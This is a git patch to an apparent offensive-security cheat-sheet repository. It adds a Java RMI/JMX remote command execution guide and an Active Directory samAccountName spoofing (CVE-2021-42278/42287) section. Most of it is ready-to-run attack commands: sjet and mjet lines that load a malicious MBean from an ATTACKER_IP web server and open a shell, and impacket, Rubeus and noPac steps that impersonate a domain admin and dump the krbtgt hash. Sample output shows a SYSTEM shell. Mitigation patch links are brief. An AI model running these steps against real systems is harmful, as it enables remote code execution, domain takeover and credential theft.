From 5714b9c9d773dce871c0afdae9c288a21dfe5807 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 13 Dec 2021 20:42:31 +0100 Subject: [PATCH] samAccountName spoofing + Java RMI --- Java RMI/README.md | 63 +++++++++++++ .../Active Directory Attack.md | 89 +++++++++++++++++++ 2 files changed, 152 insertions(+) create mode 100644 Java RMI/README.md diff --git a/Java RMI/README.md b/Java RMI/README.md new file mode 100644 index 0000000..97b33fa --- /dev/null +++ b/Java RMI/README.md @@ -0,0 +1,63 @@ +# Java RMI + +> The attacker can host a MLet file and instruct the JMX service to load MBeans from the remote host. + +## Summary + +* [Exploitation](#exploitation) + * [Requirements](#requirements) + * [Detection](#detection) + * [Remote Command Execution](#remote-command-execution) +* [References](#references) + +## Exploitation + +### Requirements +- Jython +- The JMX server can connect to a http service that is controlled by the attacker +- JMX authentication is not enabled + + +### Detection + +```powershell +$ nmap -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p TARGET_PORT TARGET_IP -Pn -v +1089/tcp open java-rmi Java RMI +| rmi-vuln-classloader: +| VULNERABLE: +| RMI registry default configuration remote code execution vulnerability +| State: VULNERABLE +| Default configuration of RMI registry allows loading classes from remote URLs which can lead to remote code execution. +| rmi-dumpregistry: +| jmxrmi +| javax.management.remote.rmi.RMIServerImpl_Stub +``` + +### Remote Command Execution + +The attack involves the following steps: +* Starting a web server that hosts the MLet and a JAR file with the malicious MBeans +* Creating a instance of the MBean javax.management.loading.MLet on the target server, using JMX +* Invoking the "getMBeansFromURL" method of the MBean instance, passing the webserver URL as parameter. The JMX service will connect to the http server and parse the MLet file. +* The JMX service downloads and loades the JAR files that were referenced in the MLet file, making the malicious MBean available over JMX. +* The attacker finally invokes methods from the malicious MBean. + +Exploit the JMX using [sjet](https://github.com/siberas/sjet) or [mjet](https://github.com/mogwailabs/mjet) + +```powershell +jython sjet.py TARGET_IP TARGET_PORT super_secret install http://ATTACKER_IP:8000 8000 +jython sjet.py TARGET_IP TARGET_PORT super_secret command "ls -la" +jython sjet.py TARGET_IP TARGET_PORT super_secret shell +jython sjet.py TARGET_IP TARGET_PORT super_secret password this-is-the-new-password +jython sjet.py TARGET_IP TARGET_PORT super_secret uninstall +jython mjet.py --jmxrole admin --jmxpassword adminpassword TARGET_IP TARGET_PORT deserialize CommonsCollections6 "touch /tmp/xxx" + +jython mjet.py TARGET_IP TARGET_PORT install super_secret http://ATTACKER_IP:8000 8000 +jython mjet.py TARGET_IP TARGET_PORT command super_secret "whoami" +jython mjet.py TARGET_IP TARGET_PORT command super_secret shell +``` + +## References + +* [ATTACKING RMI BASED JMX SERVICES - HANS-MARTIN MÜNCH - 28 APR 2019](https://mogwailabs.de/en/blog/2019/04/attacking-rmi-based-jmx-services/) +* [JMX RMI – MULTIPLE APPLICATIONS RCE - Red Timmy Security - 26th March 2019](https://www.exploit-db.com/docs/english/46607-jmx-rmi-–-multiple-applications-remote-code-execution.pdf) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 48fc398..b7b5d36 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -14,6 +14,7 @@ - [From CVE to SYSTEM shell on DC](#from-cve-to-system-shell-on-dc) - [ZeroLogon](#zerologon) - [PrintNightmare](#printnightmare) + - [samAccountName spoofing](#samaccountname-spoofing) - [Open Shares](#open-shares) - [SCF and URL file attack against writeable share](#scf-and-url-file-attack-against-writeable-share) - [SCF Files](#scf-files) @@ -672,6 +673,92 @@ Requirements: | 0x180 | unknown error code | Share is not SMB2 | +#### samAccountName spoofing + +**Requirements** +* MachineAccountQuota > 0 + +**Exploitation** + +0. Create a computer account + ```powershell + impacket@linux> addcomputer.py -computer-name 'ControlledComputer$' -computer-pass 'ComputerPassword' -dc-host DC01 -domain-netbios domain 'domain.local/user1:complexpassword' + + powermad@windows> $password = ConvertTo-SecureString 'ComputerPassword' -AsPlainText -Force + powermad@windows> New-MachineAccount -MachineAccount "ControlledComputer" -Password $($password) -Domain "domain.local" -DomainController "DomainController.domain.local" -Verbose + ``` +1. Clear the controlled machine account `servicePrincipalName` attribute + ```ps1 + impacket@linux> addspn.py -u 'domain\user' -p 'password' -t 'ControlledComputer$' -c DomainController + + powershell@windows> Set-DomainObject "CN=ControlledComputer,CN=Computers,DC=domain,DC=local" -Clear 'serviceprincipalname' -Verbose + ``` +2. (CVE-2021-42278) Change the controlled machine account `sAMAccountName` to a Domain Controller's name without the trailing `$` + ```ps1 + # https://github.com/SecureAuthCorp/impacket/pull/1224 + impacket@linux> renameMachine.py -current-name 'ControlledComputer$' -new-name 'DomainController' -dc-ip 'DomainController.domain.local' 'domain.local'/'user':'password' + + powermad@windows> Set-MachineAccountAttribute -MachineAccount "ControlledComputer" -Value "DomainController" -Attribute samaccountname -Verbose + ``` +3. Request a TGT for the controlled machine account + ```ps1 + impacket@linux> getTGT.py -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController':'ComputerPassword' + + cmd@windows> Rubeus.exe asktgt /user:"DomainController" /password:"ComputerPassword" /domain:"domain.local" /dc:"DomainController.domain.local" /nowrap + ``` +4. Reset the controlled machine account sAMAccountName to its old value + ```ps1 + impacket@linux> renameMachine.py -current-name 'DomainController' -new-name 'ControlledComputer$' 'domain.local'/'user':'password' + + powermad@windows> Set-MachineAccountAttribute -MachineAccount "ControlledComputer" -Value "ControlledComputer" -Attribute samaccountname -Verbose + ``` +5. (CVE-2021-42287) Request a service ticket with `S4U2self` by presenting the TGT obtained before + ```ps1 + # https://github.com/SecureAuthCorp/impacket/pull/1202 + impacket@linux> KRB5CCNAME='DomainController.ccache' getST.py -self -impersonate 'DomainAdmin' -spn 'cifs/DomainController.domain.local' -k -no-pass -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController' + + cmd@windows> Rubeus.exe s4u /self /impersonateuser:"DomainAdmin" /altservice:"ldap/DomainController.domain.local" /dc:"DomainController.domain.local" /ptt /ticket:[Base64 TGT] + ``` +6. DCSync: `KRB5CCNAME='DomainAdmin.ccache' secretsdump.py -just-dc-user 'krbtgt' -k -no-pass -dc-ip 'DomainController.domain.local' @'DomainController.domain.local'` + +Automated exploitation: + +* [noPac - @cube0x0](https://github.com/cube0x0/noPac) + ```powershell + noPac.exe scan -domain htb.local -user user -pass 'password123' + noPac.exe -domain htb.local -user domain_user -pass 'Password123!' /dc dc.htb.local /mAccount demo123 /mPassword Password123! /service cifs /ptt + noPac.exe -domain htb.local -user domain_user -pass "Password123!" /dc dc.htb.local /mAccount demo123 /mPassword Password123! /service ldaps /ptt /impersonate Administrator + ``` +* [sam_the_admin - @WazeHell](https://github.com/WazeHell/sam-the-admin) + ```ps1 + $ python3 sam_the_admin.py "caltech/alice.cassie:Lee@tPass" -dc-ip 192.168.1.110 -shell + [*] Selected Target dc.caltech.white + [*] Total Domain Admins 11 + [*] will try to impersonat gaylene.dreddy + [*] Current ms-DS-MachineAccountQuota = 10 + [*] Adding Computer Account "SAMTHEADMIN-11$" + [*] MachineAccount "SAMTHEADMIN-11$" password = EhFMT%mzmACL + [*] Successfully added machine account SAMTHEADMIN-11$ with password EhFMT%mzmACL. + [*] SAMTHEADMIN-11$ object = CN=SAMTHEADMIN-11,CN=Computers,DC=caltech,DC=white + [*] SAMTHEADMIN-11$ sAMAccountName == dc + [*] Saving ticket in dc.ccache + [*] Resting the machine account to SAMTHEADMIN-11$ + [*] Restored SAMTHEADMIN-11$ sAMAccountName to original value + [*] Using TGT from cache + [*] Impersonating gaylene.dreddy + [*] Requesting S4U2self + [*] Saving ticket in gaylene.dreddy.ccache + [!] Launching semi-interactive shell - Careful what you execute + C:\Windows\system32>whoami + nt authority\system + ``` + +**Mitigations**: +* KB5008602 +* [KB5008102](https://support.microsoft.com/en-us/topic/kb5008102-active-directory-security-accounts-manager-hardening-changes-cve-2021-42278-5975b463-4c95-45e1-831a-d120004e258e) +* [KB5008380](https://support.microsoft.com/en-us/topic/kb5008380-authentication-updates-cve-2021-42287-9dafac11-e0d0-4cb8-959a-143bd0201041) + + ### Open Shares > Some shares can be accessible without authentication, explore them to find some juicy files @@ -3256,3 +3343,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [CA configuration - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/ca-configuration) * [Access controls - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/access-controls) * [Web endpoints - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/web-endpoints) +* [sAMAccountName spoofing - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing) +* [CVE-2021-42287/CVE-2021-42278 Weaponisation - @exploitph](https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html) \ No newline at end of file